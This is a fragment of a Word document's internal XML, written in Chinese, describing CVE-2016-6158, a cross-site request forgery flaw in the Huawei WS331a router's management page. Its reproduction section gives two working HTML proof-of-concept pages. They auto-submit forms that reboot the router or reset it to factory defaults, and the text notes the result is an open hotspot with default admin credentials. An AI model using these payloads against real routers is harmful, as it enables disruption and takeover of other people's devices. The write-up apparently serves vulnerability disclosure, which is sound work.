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4767a890ef89363469d7974f04712a7d6ef320"/>
      <w:r>
        <w:t xml:space="preserve">（CVE-2016-6158）华为WS331a产品管理页面存在CSRF漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="一、漏洞简介"/>
      <w:r>
        <w:t xml:space="preserve">一、漏洞简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HuaweiWS331a是中国华为（Huawei）公司的一款迷你无线路由器。使用WS331a-10V100R001C01B112之前版本软件的HuaweiWS331a路由器的管理界面存在跨站请求伪造漏洞。远程攻击者可通过提交特制的请求利用该漏洞恢复出厂设置或重启设备。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="二、漏洞影响"/>
      <w:r>
        <w:t xml:space="preserve">二、漏洞影响</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WS331a-10 V100R001C02B017SP01及之前版本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="三、复现过程"/>
      <w:r>
        <w:t xml:space="preserve">三、复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="poc实现代码如下："/>
      <w:r>
        <w:t xml:space="preserve">POC实现代码如下：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">当管理员登陆后，打开如下poc页面，WS331a设备将重启。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form action="http://192.168.3.1/api/service/reboot.cgi" method="post"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; document.forms[0].submit(); &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">当管理员登陆后，打开如下poc页面，WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点，并使用amdin/admin对设备进行管理控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; document.forms[0].submit(); &lt;/script&gt;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2020-09-10T07:46:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-10T07:46:07Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>